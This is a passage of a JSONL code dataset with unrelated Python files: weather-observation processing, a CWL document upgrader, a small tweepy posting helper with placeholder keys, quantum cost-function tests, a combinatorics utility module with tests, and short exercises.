in vars_request:\n vars_api += var + ','\n vars_api = vars_api[:-1]\n \n # Units\n units = 'temp|f,precip|in,speed|kts'\n all_obs_hourly = get_obs_hourly(config, station_id, api_dates, vars_api, units)\n try:\n all_obs_hourly.to_csv(csv_file)\n if config['verbose']:\n print('obs: saving observations to csv file succeeded')\n except BaseException as e:\n if config['verbose']:\n print(\"obs: warning: '%s' while saving observations\" % str(e))\n if 'precip_accum_one_hour' in vars_request:\n obs_hourly = all_obs_hourly[['air_temp','altimeter','precip_accum_one_hour','relative_humidity','wind_speed','wind_direction']] #subset of data used as predictors\n else:\n obs_hourly = all_obs_hourly[['air_temp','altimeter','relative_humidity','wind_speed','wind_direction']] #subset of data used as predictors\n else:\n if config['verbose']:\n print('obs: obtaining observations from csv file') \n all_obs_hourly = pd.read_csv(csv_file)\n vars_request=['air_temp','altimeter','precip_accum_one_hour','relative_humidity','wind_speed', 'wind_direction']\n for var in vars_request[:]: #see if variable is available, and remove from vars_request list if not\n try:\n obs_hourly = all_obs_hourly[[var]]\n except KeyError: #no such variable, so remove from vars_request list \n vars_request.remove(var)\n obs_hourly = all_obs_hourly[['date_time']+vars_request] #subset of data used as predictors\n \n # Retrieve upper-air sounding data\n soundings = OrderedDict()\n if config['Obs']['use_soundings']:\n if config['verbose']:\n print('obs: retrieving upper-air sounding data')\n for date in dates:\n soundings[date] = OrderedDict()\n start_date = date - timedelta(days=1) # get the previous day's soundings\n for hour in [0, 12]:\n sounding_date = start_date + timedelta(hours=hour)\n try:\n sounding = upper_air(config, station_id, sounding_station_id, sounding_date, use_nan_sounding, use_existing=use_existing_sounding)\n soundings[date][sounding_date] = sounding\n except:\n print('obs: warning: problem retrieving soundings for %s' % datetime.strftime(date, '%Y%m%d'))\n soundings.pop(date)\n break\n \n # Create dictionary of days\n if config['verbose']:\n print('obs: converting to output dictionary')\n obs_export = OrderedDict({'SFC': OrderedDict(),\n 'SNDG': OrderedDict()})\n for date in dates:\n if config['Obs']['use_soundings'] and date not in soundings.keys():\n continue\n # Need to ensure we use the right intervals to have 22:5? Z obs\n start = pd.Timestamp(date - timedelta(hours=num_hours,minutes=-1))\n end = pd.Timestamp(date)\n obs_export['SFC'][date] = reindex_hourly(obs_hourly, start, end, interval,\n end_23z=True).to_dict(into=OrderedDict)\n if config['Obs']['use_soundings']:\n obs_export['SNDG'][date] = soundings[date]\n \n # Export final data\n if config['verbose']:\n print('obs: -> exporting to %s' % output_file)\n with open(output_file, 'wb') as handle:\n pickle.dump(obs_export, handle, protocol=2)\n\n return\n\ndef process(config, obs_list):\n \"\"\"\n Returns a numpy array of obs for use in mosx_predictors. The first dimension is date; all other dimensions are\n serialized.\n :param config:\n :param obs_list: list of dictionaries of processed obs data for the different stations\n :return:\n \"\"\"\n # Surface observations\n if config['verbose']:\n print('obs.process: processing array for obs data...')\n \n for i in range(len(obs_list)):\n obs = obs_list[i]\n try:\n sfc = obs['SFC']\n except KeyError:\n sfc = obs[b'SFC']\n num_days = len(sfc.keys())\n variables = sorted(sfc[list(sfc.keys())[0]].keys())\n sfc_array = get_array(sfc)\n sfc_array_r = np.reshape(sfc_array, (num_days, -1))\n\n # Sounding observations\n if config['Obs']['use_soundings']:\n try:\n sndg_array = get_array(obs['SNDG'])\n except KeyError:\n sndg_array = get_array(obs[b'SNDG'])\n # num_days should be the same first dimension\n sndg_array_r = np.reshape(sndg_array, (num_days, -1))\n obs_one_array = np.hstack((sfc_array_r, sndg_array_r))\n if i == 0: #first station\n obs_array = obs_one_array\n else:\n obs_array = np.hstack((obs_array,obs_one_array))\n else:\n if i == 0: #first station\n obs_array = sfc_array_r\n else:\n obs_array = np.hstack((obs_array,sfc_array_r))\n return obs_array\n","sub_path":"mosx/obs/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":17750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591666180","text":"#!/usr/bin/env python\n\"\"\"Transforms draft-3 CWL documents into v1.0 as idiomatically as possible.\"\"\"\n\nfrom __future__ import print_function\nfrom collections import Mapping, MutableMapping, Sequence\nimport sys\nimport copy\nfrom typing import (Any, Dict, List, Optional, # pylint:disable=unused-import\n Text, Union)\nimport ruamel.yaml\nfrom ruamel.yaml.comments import CommentedMap # for consistent sort order\n\ndef main(args=None): # type: (Optional[List[str]]) -> int\n \"\"\"Main function.\"\"\"\n if not args:\n args = sys.argv[1:]\n assert args is not None\n for path in args:\n with open(path) as entry:\n document = ruamel.yaml.safe_load(entry)\n if ('cwlVersion' in document\n and (document['cwlVersion'] == 'cwl:draft-3'\n or document['cwlVersion'] == 'draft-3')):\n document = draft3_to_v1_0(document)\n else:\n print(\"Skipping non draft-3 CWL document\", file=sys.stderr)\n print(ruamel.yaml.round_trip_dump(\n document, default_flow_style=False))\n return 0\n\n\ndef draft3_to_v1_0(document): # type: (Dict[Text, Any]) -> Dict\n \"\"\"Transformation loop.\"\"\"\n _draft3_to_v1_0(document)\n if isinstance(document, MutableMapping):\n for key, value in document.items():\n if isinstance(value, MutableMapping):\n document[key] = _draft3_to_v1_0(value)\n elif isinstance(value, list):\n for index, entry in enumerate(value):\n if isinstance(entry, MutableMapping):\n value[index] = _draft3_to_v1_0(entry)\n document['cwlVersion'] = 'v1.0'\n return sort_v1_0(document)\n\n\ndef _draft3_to_v1_0(document):\n # type: (MutableMapping[Text, Any]) -> MutableMapping[Text, Any]\n \"\"\"Inner loop for transforming draft-3 to v1.0.\"\"\"\n if \"class\" in document:\n if document[\"class\"] == \"Workflow\":\n workflow_clean(document)\n elif document[\"class\"] == \"File\":\n document[\"location\"] = document.pop(\"path\")\n elif document[\"class\"] == \"CommandLineTool\":\n input_output_clean(document)\n hints_and_requirements_clean(document)\n if isinstance(document[\"baseCommand\"], list) and \\\n len(document[\"baseCommand\"]) == 1:\n document[\"baseCommand\"] = document[\"baseCommand\"][0]\n if \"arguments\" in document and not document[\"arguments\"]:\n del document[\"arguments\"]\n clean_secondary_files(document)\n\n if \"description\" in document:\n document[\"doc\"] = document.pop(\"description\")\n\n return document\n\n\ndef workflow_clean(document): # type: (MutableMapping[Text, Any]) -> None\n \"\"\"Transform draft-3 style Workflows to more idiomatic v1.0\"\"\"\n input_output_clean(document)\n hints_and_requirements_clean(document)\n outputs = document['outputs']\n for output_id in outputs:\n outputs[output_id][\"outputSource\"] = \\\n outputs[output_id].pop(\"source\").lstrip('#').replace(\".\", \"/\")\n new_steps = CommentedMap()\n for step in document[\"steps\"]:\n new_step = CommentedMap()\n new_step.update(step)\n step = new_step\n step_id = step.pop(\"id\")\n step_id_len = len(step_id)+1\n step[\"out\"] = []\n for outp in step[\"outputs\"]:\n clean_outp_id = outp[\"id\"]\n if clean_outp_id.startswith(step_id):\n clean_outp_id = clean_outp_id[step_id_len:]\n step[\"out\"].append(clean_outp_id)\n del step[\"outputs\"]\n ins = CommentedMap()\n for inp in step[\"inputs\"]:\n ident = inp[\"id\"]\n if ident.startswith(step_id):\n ident = ident[step_id_len:]\n if 'source' in inp:\n inp[\"source\"] = inp[\"source\"].lstrip('#').replace(\".\", \"/\")\n del inp[\"id\"]\n if len(inp) > 1:\n ins[ident] = inp\n elif len(inp) == 1:\n if \"source\" in inp:\n ins[ident] = inp.popitem()[1]\n else:\n ins[ident] = inp\n else:\n ins[ident] = {}\n step[\"in\"] = ins\n del step[\"inputs\"]\n if \"scatter\" in step:\n if isinstance(step[\"scatter\"], (str, Text)) == 1:\n source = step[\"scatter\"]\n if source.startswith(step_id):\n source = source[step_id_len:]\n step[\"scatter\"] = source\n elif isinstance(step[\"scatter\"], list) and len(step[\"scatter\"]) > 1:\n step[\"scatter\"] = []\n for source in step[\"scatter\"]:\n if source.startswith(step_id):\n source = source[step_id_len:]\n step[\"scatter\"].append(source)\n else:\n source = step[\"scatter\"][0]\n if source.startswith(step_id):\n source = source[step_id_len:]\n step[\"scatter\"] = source\n if \"description\" in step:\n step[\"doc\"] = step.pop(\"description\")\n new_steps[step_id.lstrip('#')] = step\n document[\"steps\"] = new_steps\n\n\ndef input_output_clean(document): # type: (MutableMapping[Text, Any]) -> None\n \"\"\"Transform draft-3 style input/output listings into idiomatic v1.0.\"\"\"\n for param_type in ['inputs', 'outputs']:\n if param_type not in document:\n break\n new_section = CommentedMap()\n for param in document[param_type]:\n param_id = param.pop('id').lstrip('#')\n if 'type' in param:\n param['type'] = shorten_type(param['type'])\n if 'description' in param:\n param['doc'] = param.pop('description')\n if len(param) > 1:\n new_section[param_id] = sort_input_or_output(param)\n else:\n new_section[param_id] = param.popitem()[1]\n document[param_type] = new_section\n\n\ndef hints_and_requirements_clean(document):\n # type: (MutableMapping[Text, Any]) -> None\n \"\"\"Transform draft-3 style hints/reqs into idiomatic v1.0 hints/reqs.\"\"\"\n for section in ['hints', 'requirements']:\n if section in document:\n new_section = {}\n for entry in document[section]:\n if entry[\"class\"] == \"CreateFileRequirement\":\n entry[\"class\"] = \"InitialWorkDirRequirement\"\n entry[\"listing\"] = []\n for filedef in entry[\"fileDef\"]:\n entry[\"listing\"].append({\n \"entryname\": filedef[\"filename\"],\n \"entry\": filedef[\"fileContent\"]\n })\n del entry[\"fileDef\"]\n new_section[entry[\"class\"]] = entry\n del entry[\"class\"]\n document[section] = new_section\n\n\ndef shorten_type(type_obj): # type: (List[Any]) -> Union[Text, List[Any]]\n \"\"\"Transform draft-3 style type declarations into idiomatic v1.0 types.\"\"\"\n if isinstance(type_obj, (str, Text)) or not isinstance(type_obj, Sequence):\n return type_obj\n new_type = []\n for entry in type_obj: # find arrays that we can shorten and do so\n if isinstance(entry, Mapping):\n if (entry['type'] == 'array' and\n isinstance(entry['items'], (str, Text))):\n entry = entry['items'] + '[]'\n elif entry['type'] == 'enum':\n entry = sort_enum(entry)\n new_type.extend([entry])\n if len(new_type) == 2:\n if 'null' in new_type:\n type_copy = copy.deepcopy(new_type)\n type_copy.remove('null')\n if isinstance(type_copy[0], (str, Text)):\n return type_copy[0] + '?'\n if len(new_type) == 1:\n return new_type[0]\n return new_type\n\n\ndef clean_secondary_files(document):\n # type: (MutableMapping[Text, Any]) -> None\n \"\"\"Cleanup for secondaryFiles\"\"\"\n if \"secondaryFiles\" in document:\n for i, sfile in enumerate(document[\"secondaryFiles\"]):\n if \"$(\" in sfile or \"${\" in sfile:\n document[\"secondaryFiles\"][i] = sfile.replace(\n '\"path\"', '\"location\"').replace(\".path\", \".location\")\n\n\ndef sort_v1_0(document): # type: (Dict) -> Dict\n \"\"\"Sort the sections of the CWL document in a more meaningful order.\"\"\"\n keyorder = ['cwlVersion', 'class', 'id', 'label', 'doc', 'requirements',\n 'hints', 'inputs', 'stdin', 'baseCommand', 'steps',\n 'expression', 'arguments', 'stderr', 'stdout', 'outputs',\n 'successCodes', 'temporaryFailCodes', 'permanentFailCodes']\n return CommentedMap(\n sorted(document.items(), key=lambda i: keyorder.index(i[0])\n if i[0] in keyorder else 100))\n\n\ndef sort_enum(enum): # type: (Mapping) -> Dict\n \"\"\"Sort the enum type definitions in a more meaningful order.\"\"\"\n keyorder = ['type', 'name', 'label', 'symbols', 'inputBinding']\n return CommentedMap(\n sorted(enum.items(), key=lambda i: keyorder.index(i[0])\n if i[0] in keyorder else 100))\n\n\ndef sort_input_or_output(io_def): # type: (Dict) -> Dict\n \"\"\"Sort the input definitions in a more meaningful order.\"\"\"\n keyorder = ['label', 'doc', 'type', 'format', 'secondaryFiles',\n 'default', 'inputBinding', 'outputBinding', 'streamable']\n return CommentedMap(\n sorted(io_def.items(), key=lambda i: keyorder.index(i[0])\n if i[0] in keyorder else 100))\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"cwlupgrader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"374092197","text":"\n\"\"\"\n입력 Sequence (inputlist)는 중복된 숫자를 갖는 리스트입니다.\n결과 Set은 중복을 허용하지 않으므로 중복된 데이타는 자연스럽게 제거가 되어집니다.\nSet은 요소의 순서를 보장하지 않으므로, 결과를보면 순서가 랜덤하게 바뀐 결과를 출력하게 됩니다.\n\"\"\"\n\ninputlist = [1, 1, 1, 2, 3, 3, 4]\n \nnewlist = {i*i for i in inputlist}\n \nprint(newlist)\n# {16, 1, 4, 9}","sub_path":"PythonMain/src/ch09-collection/ch-SetComprehension/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584503365","text":"import tweepy\nimport sys\n\nconsumer_key = 'XXXX'\nconsumer_secret = 'XXXX'\naccess_token = 'XXXX'\naccess_token_secret = 'XXXX'\n\ndef upload_media(url,status_val):\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n # api.update_status('hi')\n media = api.media_upload(url)\n # print(media)\n post_result = api.update_status(status=status_val, media_ids=[media.media_id])\n print(\"success!!\")\n return '0'","sub_path":"TwitterBot.py","file_name":"TwitterBot.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49475863","text":"from functools import partial\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\nfrom openfermion import QubitOperator\nfrom sympy import Symbol\nfrom zquantum.core.cost_function import (\n AnsatzBasedCostFunction,\n get_ground_state_cost_function,\n sum_expectation_values,\n)\nfrom zquantum.core.estimation import (\n allocate_shots_proportionally,\n allocate_shots_uniformly,\n calculate_exact_expectation_values,\n estimate_expectation_values_by_averaging,\n)\nfrom zquantum.core.interfaces.mock_objects import MockAnsatz\nfrom zquantum.core.measurement import ExpectationValues\nfrom zquantum.core.symbolic_simulator import SymbolicSimulator\nfrom zquantum.core.utils import create_symbols_map\n\nRNGSEED = 1234\n\n\n@pytest.fixture(\n params=[\n {\n \"target_operator\": QubitOperator(\"Z0\"),\n \"parametrized_circuit\": MockAnsatz(\n number_of_layers=1, problem_size=1\n ).parametrized_circuit,\n \"backend\": SymbolicSimulator(),\n \"estimation_method\": estimate_expectation_values_by_averaging,\n \"estimation_preprocessors\": [\n partial(allocate_shots_uniformly, number_of_shots=1)\n ],\n },\n {\n \"target_operator\": QubitOperator(\"Z0 Z1\"),\n \"parametrized_circuit\": MockAnsatz(\n number_of_layers=1, problem_size=2\n ).parametrized_circuit,\n \"backend\": SymbolicSimulator(),\n \"estimation_method\": estimate_expectation_values_by_averaging,\n \"estimation_preprocessors\": [\n partial(allocate_shots_uniformly, number_of_shots=1)\n ],\n },\n {\n \"target_operator\": QubitOperator(\"Z0 Z1\"),\n \"parametrized_circuit\": MockAnsatz(\n number_of_layers=2, problem_size=2\n ).parametrized_circuit,\n \"backend\": SymbolicSimulator(),\n \"estimation_method\": estimate_expectation_values_by_averaging,\n \"fixed_parameters\": [1.2],\n \"estimation_preprocessors\": [\n partial(allocate_shots_uniformly, number_of_shots=1)\n ],\n },\n {\n \"target_operator\": QubitOperator(\"Z0 Z1\"),\n \"parametrized_circuit\": MockAnsatz(\n number_of_layers=2, problem_size=2\n ).parametrized_circuit,\n \"backend\": SymbolicSimulator(),\n \"estimation_method\": estimate_expectation_values_by_averaging,\n \"fixed_parameters\": [1.2],\n \"parameter_precision\": 0.001,\n \"parameter_precision_seed\": RNGSEED,\n \"estimation_preprocessors\": [\n partial(allocate_shots_uniformly, number_of_shots=1)\n ],\n },\n {\n \"target_operator\": QubitOperator(\"Z0\"),\n \"parametrized_circuit\": MockAnsatz(\n number_of_layers=1, problem_size=1\n ).parametrized_circuit,\n \"backend\": SymbolicSimulator(),\n \"estimation_method\": estimate_expectation_values_by_averaging,\n \"estimation_preprocessors\": [\n partial(allocate_shots_proportionally, total_n_shots=1)\n ],\n },\n ]\n)\ndef ground_state_cost_function(request):\n return get_ground_state_cost_function(**request.param)\n\n\ndef test_ground_state_cost_function_returns_value_between_plus_and_minus_one(\n ground_state_cost_function,\n):\n params = np.array([1.0], dtype=float)\n value = ground_state_cost_function(params)\n assert -1 <= value <= 1\n\n\ndef test_noisy_ground_state_cost_function_adds_noise_to_parameters():\n target_operator = QubitOperator(\"Z0\")\n parametrized_circuit = MockAnsatz(\n number_of_layers=2, problem_size=1\n ).parametrized_circuit\n parametrized_circuit.bind = mock.Mock(wraps=parametrized_circuit.bind)\n backend = SymbolicSimulator()\n estimation_method = estimate_expectation_values_by_averaging\n estimation_preprocessors = [partial(allocate_shots_uniformly, number_of_shots=1)]\n noisy_ground_state_cost_function = get_ground_state_cost_function(\n target_operator,\n parametrized_circuit,\n backend,\n estimation_method=estimation_method,\n estimation_preprocessors=estimation_preprocessors,\n parameter_precision=1e-4,\n parameter_precision_seed=RNGSEED,\n )\n\n generator = np.random.default_rng(RNGSEED)\n\n # We expect the below to get added to parameters\n noise = generator.normal(0, 1e-4, 2)\n\n params = np.array([0.1, 2.3], dtype=float)\n\n expected_symbols_map = {\n Symbol(\"theta_0\"): noise[0] + params[0],\n Symbol(\"theta_1\"): noise[1] + params[1],\n }\n\n # ansatz based cost function may modify params in place\n # and we need original ones - therefore we pass a copy\n noisy_ground_state_cost_function(np.array(params))\n\n # We only called our function once, therefore the following should be true\n parametrized_circuit.bind.assert_called_with(expected_symbols_map)\n\n # and if only everything went right, this only call should be of the form\n # noisy_ansatz.ansatz.get_executable_circuit(params+noise)\n # Therefore, we extract the single argument and compare it to the\n # expected one.\n assert np.array_equal(\n parametrized_circuit.bind.call_args[0][0], expected_symbols_map\n )\n\n # Note, normally, we weould just do it in a single assert:\n # noisy_ansatz.ansatz.get_executable_circuit.assert_called_once_with(params_noise)\n # However, this does not work with numpy arrays, as it uses == operator\n # to compare arguments, which does not produce boolean value for numpy arrays\n\n\ndef test_sum_expectation_values():\n expectation_values = ExpectationValues(np.array([5, -2, 1]))\n total = sum_expectation_values(expectation_values)\n assert np.isclose(total.value, 4)\n assert total.precision is None\n\n\ndef test_sum_expectation_values_with_covariances():\n values = np.array([5, -2, 1])\n correlations = [np.array([[1, 0.5], [0.5, 2]]), np.array([[7]])]\n covariances = [correlations[0] / 10, correlations[1] / 10]\n expectation_values = ExpectationValues(values, correlations, covariances)\n total = sum_expectation_values(expectation_values)\n assert np.isclose(total.value, 4)\n assert np.isclose(total.precision, np.sqrt((1 + 0.5 + 0.5 + 2 + 7) / 10))\n\n\n@pytest.fixture\ndef ansatz_based_cost_function():\n target_operator = QubitOperator(\"Z0\")\n ansatz = MockAnsatz(number_of_layers=1, problem_size=1)\n backend = SymbolicSimulator()\n estimation_method = estimate_expectation_values_by_averaging\n estimation_preprocessors = [partial(allocate_shots_uniformly, number_of_shots=1)]\n return AnsatzBasedCostFunction(\n target_operator,\n ansatz,\n backend,\n estimation_method=estimation_method,\n estimation_preprocessors=estimation_preprocessors,\n )\n\n\ndef test_ansatz_based_cost_function_returns_value_between_plus_and_minus_one(\n ansatz_based_cost_function,\n):\n params = np.array([1])\n value = ansatz_based_cost_function(params)\n assert -1 <= value <= 1\n\n\n@pytest.fixture\ndef noisy_ansatz_cost_function_with_ansatz():\n target_operator = QubitOperator(\"Z0\")\n ansatz = MockAnsatz(number_of_layers=2, problem_size=1)\n backend = SymbolicSimulator()\n estimation_method = mock.Mock(wraps=calculate_exact_expectation_values)\n return (\n AnsatzBasedCostFunction(\n target_operator,\n ansatz,\n backend,\n estimation_method=estimation_method,\n parameter_precision=1e-4,\n parameter_precision_seed=RNGSEED,\n ),\n ansatz,\n )\n\n\ndef test_ansatz_based_cost_function_adds_noise_to_parameters(\n noisy_ansatz_cost_function_with_ansatz,\n):\n noisy_ansatz_cost_function = noisy_ansatz_cost_function_with_ansatz[0]\n ansatz = noisy_ansatz_cost_function_with_ansatz[1]\n generator = np.random.default_rng(RNGSEED)\n\n # We expect the below to get added to parameters\n noise = generator.normal(0, 1e-4, 2)\n\n params = np.array([0.1, 2.3])\n\n # ansatz based cost function may modify params in place\n # and we need original ones - therefore we pass a copy\n noisy_ansatz_cost_function(np.array(params))\n\n # We only called our function once, therefore the following should be true\n noisy_ansatz_cost_function.estimation_method.assert_called_once()\n\n # Here, we make the expected executable circuit with the noisy parameters\n noisy_symbols_map = create_symbols_map(\n ansatz.parametrized_circuit.free_symbols, noise + params\n )\n expected_noisy_circuit = ansatz.parametrized_circuit.bind(noisy_symbols_map)\n\n assert (\n noisy_ansatz_cost_function.estimation_method.call_args[0][1][0].circuit\n == expected_noisy_circuit\n )\n","sub_path":"tests/zquantum/core/cost_function_test.py","file_name":"cost_function_test.py","file_ext":"py","file_size_in_byte":8819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"359546145","text":"\"\"\"Exercício Python 060: Faça um programa que\nleia um número qualquer e mostre o seu fatorial.\nEx: 5! = 5 x 4 x 3 x 2 x 1 = 120\"\"\"\n\nfrom math import factorial\n\nx = int(input('\\033[1;33mDigite um número: '))\ncont = int(x - 1)\n\nprint(f'{x}! = {x}', end=' ')\n\nwhile cont >= 1:\n\n print(f'* {cont}', end=' ')\n cont -= 1\n\nprint(f'= {factorial(x)}')\n","sub_path":"ExerciceList/ex060.py","file_name":"ex060.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316551507","text":"\"\"\"combtools: Extends itertools to provide more combinatorial constructs.\n\nAuthor: Ricardo Bittencourt \n\n\"\"\"\n\nimport itertools\nimport math\nimport random\nimport unittest\n\ndef integer_compositions(n):\n \"\"\"Compositions of an integer (as an ordered sum of positive integers).\n\n Returns an iterator over the compositions of the given integer n.\n Example: n=3 -> 3 = 2+1 = 1+2 = 1+1+1.\n Wiki: http://en.wikipedia.org/wiki/Composition_(combinatorics)\n OEIS: http://oeis.org/search?q=A000079\n Complexity: O(n)/element\n\n Args:\n n: positive integer to be represented as a composition.\n Returns:\n an iterator over the compositions of n. Each composition is a list\n of integers, whose sum is n.\n \"\"\"\n if n == 0:\n yield []\n else:\n yield [n]\n for i in range(n - 1, 0, -1):\n for composition in integer_compositions(n - i):\n yield [i] + composition\n\n\ndef integer_partitions(n):\n \"\"\"Partitions of an integer (as an unordered sum of positive integers).\n\n Returns an iterator over the compositions of the given integer n.\n Example: n=3 -> 3 = 2+1 = 1+1+1.\n Wiki: http://en.wikipedia.org/wiki/Partition_(number_theory)\n OEIS: http://oeis.org/search?q=A000041\n Complexity: O(n)/element\n\n Args:\n n: positive integer to be represented as a partition.\n Returns:\n an iterator over the partitions of n. Each partition is a list\n of integers, whose sum is n.\n \"\"\"\n def _partitions(n, max_term):\n \"\"\"Partitions of n where no term is greater than max_term.\"\"\"\n if n == 0:\n yield []\n else:\n for i in range(max_term, 0, -1):\n for partition in _partitions(n - i, min(n - i, i)):\n yield [i] + partition\n return _partitions(n, n)\n\n\ndef set_partitions(seq):\n \"\"\"Partitions of a set.\n\n Returns an iterator over the set partitions of a sequence.\n Example: seq=1,2,3 -> 123, 1|2|3, 12|3, 13|2, 1|23\n Wiki: http://en.wikipedia.org/wiki/Partition_of_a_set\n OEIS: http://oeis.org/search?q=A000110\n Complexity: O(n)/element\n\n Args:\n seq: a sequence to be partitioned.\n Returns:\n an iterator over the set partitions of seq. Each partition is a list\n of elements of seq, whose union is seq.\n \"\"\"\n def gen(pos, max_term, cur):\n if pos == n:\n yield cur\n else:\n for i in range(0, 1 + max_term):\n updated = cur + [i]\n for elem in gen(pos + 1, max(updated) + 1, updated):\n yield elem\n def convert(partition):\n for encoded in partition:\n ans = [[] for i in range(n)]\n for i, j in enumerate(encoded):\n ans[j].append(seq[i])\n yield [x for x in ans if x]\n n = len(seq)\n return convert(gen(1, 1, [0]))\n\n\ndef bracketings(n):\n \"\"\"Bracketings on n letters.\n\n Returns an iterator over all bracketings on n letters, represented\n as trees with n leaves and no unary branches.\n Example: n=3 -> ((ab)c) (a(bc)) (abc)\n Info: http://mathworld.wolfram.com/Bracketing.html\n OEIS: http://oeis.org/search?q=A000110\n Complexity: O(n)/element\n\n Args:\n n: positive integer with the size of the bracketings\n Returns:\n an iterator over all bracketings on n letters of seq. Each bracketing\n is represented as tree, where an internal node is a tuple of tuples,\n and an external node is the empty tuple.\n \"\"\"\n if n == 1:\n yield ()\n for part in integer_compositions(n):\n if len(part) > 1:\n for brac in itertools.product(*(bracketings(i) for i in part)):\n yield brac\n\n\ndef permutations(seq):\n \"\"\"Permutations of a sequence.\n\n Returns an iterator over all permutations of a sequence.\n Example: n=3 -> 123, 132, 213, 231, 312, 321\n Wiki: http://en.wikipedia.org/wiki/Permutation\n OEIS: http://oeis.org/search?q=A000142\n Complexity: O(n)/element\n\n Args:\n seq: sequence to be permutated.\n Returns:\n an iterator over all permutations of the sequence.\n \"\"\"\n return itertools.permutations(seq)\n\n\ndef random_permutation(seq):\n answer = list(seq)\n random.shuffle(answer)\n return answer\n\ndef random_cycle(seq):\n # Knuth shuffle\n n = len(seq)\n seq = list(seq)\n for i in range(n-1 , 0, -1):\n pos = random.randint(0, i)\n seq[i], seq[pos] = seq[pos], seq[i]\n return seq\n\n\ndef _is_reverse_sorted(seq):\n for i in range(len(seq) - 1):\n if seq[i] < seq[i + 1]:\n return False\n return True\n\n\ndef _immutable(seq):\n if isinstance(seq, list):\n return tuple(_immutable(i) for i in seq)\n else:\n return seq\n\n\nclass _CombtoolsTest(unittest.TestCase):\n \"\"\"Unit tests.\"\"\"\n\n def _unique_len(self, seq):\n seq = list(seq)\n size = len(seq)\n self.assertEqual(size, len(set(_immutable(i) for i in seq)))\n return size\n\n def _flatten_sort(self, seq):\n return list(sorted(itertools.chain(*seq)))\n\n def test_integer_compositions(self):\n # Sizes given by OEIS A000079.\n self.assertEqual(\n [1, 2, 4, 8, 16, 32, 64, 128],\n [self._unique_len(integer_compositions(i)) for i in range(1,9)])\n\n for n in range(1, 9):\n for composition in integer_compositions(n):\n # Terms must sum to n.\n self.assertEqual(n, sum(composition))\n # Terms must be less or equal to n.\n self.assertTrue(all(i <= n for i in composition))\n\n for n in range(1, 9):\n # Results must be in reverse lexicographical order.\n self.assertTrue(\n _is_reverse_sorted(list(integer_compositions(n))))\n\n def test_integer_partitions(self):\n # Sizes given by OEIS A000041.\n self.assertEqual(\n [1, 2, 3, 5, 7, 11, 15, 22],\n [self._unique_len(integer_partitions(i)) for i in range(1,9)])\n\n for n in range(1, 9):\n for partition in integer_partitions(n):\n # Terms must sum to n.\n self.assertEqual(n, sum(partition))\n # Terms must be less or equal to n.\n self.assertTrue(all(i <= n for i in partition))\n # Terms must be sorted.\n self.assertTrue(_is_reverse_sorted(partition))\n\n for n in range(1, 9):\n # Results must be in reverse lexicographical order.\n self.assertTrue(\n _is_reverse_sorted(list(integer_partitions(n))))\n\n def test_set_partitions(self):\n # Sizes given by OEIS A000110.\n self.assertEqual(\n [1, 2, 5, 15, 52, 203, 877, 4140],\n [self._unique_len(set_partitions(range(i))) for i in range(1,9)])\n\n for n in range(1, 9):\n for partition in set_partitions(range(n)):\n # Terms must be lists of lists.\n self.assertTrue(all(isinstance(i, list) for i in partition))\n # After flattening and sorting, must be equal to range(n).\n self.assertEqual(range(n), self._flatten_sort(partition))\n\n def _is_bracketing(self, brac):\n if len(brac) == 1:\n return brac == ()\n else:\n return all(self._is_bracketing(b) for b in brac)\n\n def test_bracketings(self):\n # Sizes given by OEIS A001003.\n self.assertEqual(\n [1, 1, 3, 11, 45, 197, 903, 4279],\n [self._unique_len(bracketings(i)) for i in range(1,9)])\n\n for n in range(1, 9):\n for bracketing in bracketings(n):\n # Terms must be bracketings.\n self.assertTrue(self._is_bracketing(bracketing))\n\n def test_permutations(self):\n # Sizes given by OEIS A000142.\n self.assertEqual(\n [1, 2, 6, 24, 120, 720, 5040, 40320],\n [self._unique_len(permutations(range(i))) for i in range(1,9)])\n\n for n in range(1, 9):\n for permutation in permutations(range(n)):\n # After sorting, must be equal to range(n).\n self.assertEqual(range(n), sorted(permutation))\n\n def _uniform_chi_square(self, universe, get_sample): \n universe_map = {tuple(elem): i for i, elem in enumerate(universe)}\n size = len(universe_map)\n hist = [0] * size\n # The expected value for chi-square must be greater than 5.\n # We're taking ten times that for safety.\n expected = 50\n for _ in range(expected * size):\n hist[universe_map[tuple(get_sample())]] += 1\n chi_square = sum(((h - expected) ** 2) / float(expected) for h in hist)\n # When degrees > 50, the expression below is asymptotic to a normal\n # distribution N(0,1). We're rejecting anything beyond 3 sigma,\n # which is about 99.7%.\n degrees = size - 1\n return abs(chi_square - degrees) / (2 * degrees) ** 0.5 < 3\n\n def test_random_permutation(self):\n size = 5\n seq = range(size)\n all_permutations = permutations(seq)\n gen_permutations = lambda: random_permutation(seq)\n self.assertTrue(self._uniform_chi_square(\n all_permutations, gen_permutations))\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"combtools.py","file_name":"combtools.py","file_ext":"py","file_size_in_byte":9341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271006254","text":"\n\nfrom xai.brain.wordbase.nouns._siding import _SIDING\n\n#calss header\nclass _SIDINGS(_SIDING, ):\n\tdef __init__(self,): \n\t\t_SIDING.__init__(self)\n\t\tself.name = \"SIDINGS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"siding\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sidings.py","file_name":"_sidings.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"275020424","text":"def fibo(num):\r\n if 